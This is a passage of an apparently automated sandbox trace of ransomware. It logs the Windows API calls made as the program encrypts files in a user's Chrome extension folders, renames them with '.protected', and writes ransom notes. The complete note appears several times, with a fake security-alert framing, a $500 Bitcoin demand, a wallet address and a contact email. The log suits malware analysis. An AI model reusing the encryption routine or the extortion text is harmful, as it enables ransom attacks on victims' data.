(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.469] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.469] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.469] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.469] CloseHandle (hObject=0x164) returned 1 [0079.469] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.469] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0079.469] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0079.469] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0079.469] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0079.469] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0079.469] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru") returned 142 [0079.469] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0079.469] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0079.469] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\*") returned 144 [0079.469] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.470] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.470] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.470] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.470] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.470] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.470] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\.") returned 144 [0079.470] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.470] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.470] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.470] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.470] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.470] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.470] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.470] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\..") returned 145 [0079.470] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.470] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.470] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.470] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.470] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.470] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.470] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.470] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.470] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json") returned 156 [0079.470] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.470] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.470] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.470] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.471] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json") returned 156 [0079.471] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.471] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json") returned 156 [0079.471] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.471] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json") returned 156 [0079.471] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.471] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x152, lpOverlapped=0x0) returned 1 [0079.472] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.472] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x152, lpOverlapped=0x0) returned 1 [0079.472] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.472] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.472] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.473] CloseHandle (hObject=0x168) returned 1 [0079.473] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.protected") returned 166 [0079.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.protected")) returned 1 [0079.473] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.474] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.474] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\RESTORE_FILES.txt") returned 160 [0079.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.474] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.474] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.475] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.475] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.475] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.475] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.476] CloseHandle (hObject=0x164) returned 1 [0079.476] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.476] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0079.476] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0079.476] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0079.476] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0079.476] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0079.476] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk") returned 142 [0079.476] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0079.476] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0079.476] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\*") returned 144 [0079.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.476] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.476] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.476] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.476] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.476] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.477] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\.") returned 144 [0079.477] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.477] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.477] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.477] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.477] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.477] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.477] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.477] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\..") returned 145 [0079.477] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.477] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.477] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.477] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.477] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.477] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.477] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.477] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.477] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json") returned 156 [0079.477] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.477] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.477] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.477] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json") returned 156 [0079.479] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json") returned 156 [0079.479] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json") returned 156 [0079.479] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.479] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x112, lpOverlapped=0x0) returned 1 [0079.480] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.480] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x112, lpOverlapped=0x0) returned 1 [0079.481] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.481] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.481] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.481] CloseHandle (hObject=0x168) returned 1 [0079.481] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.protected") returned 166 [0079.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.protected")) returned 1 [0079.482] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.482] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.482] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\RESTORE_FILES.txt") returned 160 [0079.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.483] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.483] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.485] lstrlenA 